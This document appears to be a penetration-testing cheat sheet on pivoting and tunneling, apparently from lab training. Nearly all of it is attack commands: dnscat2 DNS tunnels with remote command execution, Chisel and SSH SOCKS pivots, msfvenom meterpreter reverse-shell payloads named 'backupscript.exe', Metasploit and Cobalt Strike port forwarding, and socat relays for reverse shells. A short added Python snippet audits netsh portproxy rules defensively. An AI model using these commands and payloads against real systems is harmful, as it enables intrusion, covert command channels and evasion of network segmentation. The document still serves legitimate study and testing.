# Pivoting, Tunneling and Forwarding

## Advanced Tunneling Methods

### DNS Tunneling

```powershell
# Start dnscat2 Server
sudo ruby dnscat2.rb --dns host=<tun0>,port=53,domain=inlanefreight.local --no-cache

# Import Module
Import-Module .\dnscat2.ps1

# Gain Connection
Start-Dnscat2 -DNSserver <tun0> -Domain <domain> -PreSharedSecret <secret> -Exec cmd

# Interact With Session
windows -i <id>

```

### SOCKS5 With Chisel

```bash
# Server Side
./chisel server -v -p 1234 --socks5

# Target Side
./chisel client -v 10.129.202.64:1234 socks

# Now we can use proxychains
socks5 127.0.0.1 1080
```

### Chisel Reverse Pivot

```bash
# Server Side
sudo ./chisel server --reverse -v -p 1234 --socks5

# Target Side
./chisel client -v 10.10.14.17:1234 R:socks

# Proxychains
socks5 127.0.0.1 1080
```

### RDP & SOCKS Tunneling with SocksOverRDP

```bash
# Register the plugin DLL on the RDP client host
regsvr32.exe SocksOverRDP-Plugin.dll

# Proxifier: point it at the plugin's listener
127.0.0.1:1080 over SOCKS5
```

***

## Dynamic Port Forwarding (SSH + Socks)

### Local Port Forward SSH

It forwards connections made to `<local-port>` on the attack host to `<remote-port>` on the target server over the SSH session.

```bash
# Local Port -> Can be any port
# Remote Port -> The port where the target service is listening on
ssh -L <local-port>:127.0.0.1:<remote-port> <user>@<IP>

# Confirm Port Forwarding
netstat -antp | grep <local-port>

# Forwarding Several Ports (one -L per forward)
ssh -L <local-port>:localhost:<remote-port> -L <local-port2>:localhost:<remote-port2> <user>@<IP>
```

### SSH Tunneling over SOCKS Proxy

```bash
# SSH Command
ssh -D 1080 <user>@<IP>

# Add the proxy to /etc/proxychains.conf
socks4 127.0.0.1 1080
```

### Reverse Port Forwarding SSH

```bash
# Generate the reverse shell, pointing it at the internal IP of the pivot host
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8080 -f exe -o backupscript.exe

# In msfconsole the multi/handler listens locally:
# set lport 8000
# set lhost 127.0.0.1

# Reverse Port Forward: pivot host 8080 -> attack host 8000
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
```

### Cobalt Tunneling & Port Forwarding

```bash
# Socks4 Proxy
socks 1080

# socks5
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# Reverse Port Forward
rportfwd <bind-port> <forward-host> <forward-port>
```

### MSF Socks Proxy

```bash
use auxiliary/server/socks_proxy
set srvport 1080
set srvhost 0.0.0.0
set version 4a

# Verify Proxy runs
jobs
```

### Metasploit Autoroute

```bash
use post/multi/manage/autoroute
set session <session id>
set subnet <ip>
run

# Shorter Method
run autoroute -s <ip>/24
```

### Metasploit Port Forwarding

```bash
portfwd add -l <local-port> -p <remote-port> -r <ip>
```

### Metasploit Reverse Forwarding

```bash
portfwd add -R -l <local-port> -p <remote-port> -L <tun0>

# Setup Listener
set payload windows/x64/meterpreter/reverse_tcp
set lport <local-port>
set lhost 0.0.0.0
run

# Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<pivot-ip> -f exe -o backupscript.exe LPORT=<remote-port>
```

***

## Port Forwarding Tools

### Plink

```powershell
plink -D 9050 ubuntu@<IP>
```

### Proxifier

Proxifier is a Windows tool that routes the traffic of desktop client applications through a SOCKS or HTTPS proxy and also supports proxy chaining.

### Sshuttle

```bash
sshuttle -r ubuntu@10.129.202.64 <target-ip-subnet> -v
```

### Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling.

```bash
# Setup Server
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

# Upload client.py to Target

# On Target machine
python2.7 client.py --server-ip <IP> --server-port 9999
```

### Netsh

```powershell
# Example: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=<current-host> connectport=3389 connectaddress=<target-host>

# Verify Netsh
netsh.exe interface portproxy show v4tov4

```
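As an added defensive check (not part of the original notes), a small Python parser for the `netsh.exe interface portproxy show v4tov4` output above: it lists configured forwards and flags the ones to investigate first. The sample output is constructed from the example values on this page, and the admin-port list and the /24 "same network" heuristic are assumptions.

```python
import ipaddress
import re

# Constructed sample of `netsh.exe interface portproxy show v4tov4` output, built from
# the example values above plus one extra rule; not captured from a real host.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.25     3389
0.0.0.0         4444        10.0.0.5        445
"""

# One data row: listen address, listen port, connect address, connect port.
ROW_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+)\s*$")

# Destination ports that usually mean the proxy exposes a remote-admin service (assumed list).
ADMIN_PORTS = {22: "SSH", 445: "SMB", 3389: "RDP", 5985: "WinRM"}


def parse_portproxy(text):
    """Return [(listen_addr, listen_port, connect_addr, connect_port), ...]."""
    rules = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            la, lp, ca, cp = m.groups()
            rules.append((la, int(lp), ca, int(cp)))
    return rules


def review_portproxy(rules, same_net_prefix=24):
    """Attach review reasons to each rule. Every portproxy entry on a host that is not a
    known relay deserves a look; the reasons only say which ones to check first.
    The /24 'same network' test is an assumption, adjust it to your addressing plan."""
    findings = []
    for la, lp, ca, cp in rules:
        reasons = []
        if cp in ADMIN_PORTS:
            reasons.append("forwards to %s" % ADMIN_PORTS[cp])
        if la == "0.0.0.0":
            reasons.append("listens on all interfaces")
        else:
            listen_net = ipaddress.ip_network("%s/%d" % (la, same_net_prefix), strict=False)
            if ipaddress.ip_address(ca) not in listen_net:
                reasons.append("bridges to another subnet")
        findings.append(((la, lp, ca, cp), reasons))
    return findings
```

The same rules persist under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp`, so the registry key is worth baselining alongside the `netsh` output.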

### Socat

#### Socat Redirection with a Reverse Shell

```bash
# Example: socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
socat TCP4-LISTEN:<local-port>,fork TCP4:<attack-host-ip>:<remote-port>

# Generate Payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run
```

#### Socat Redirection with Bind Shells

```bash
# Example: socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
socat TCP4-LISTEN:<listen-port>,fork TCP4:<target-ip>:<port-needs-to-be-forwarded>
```
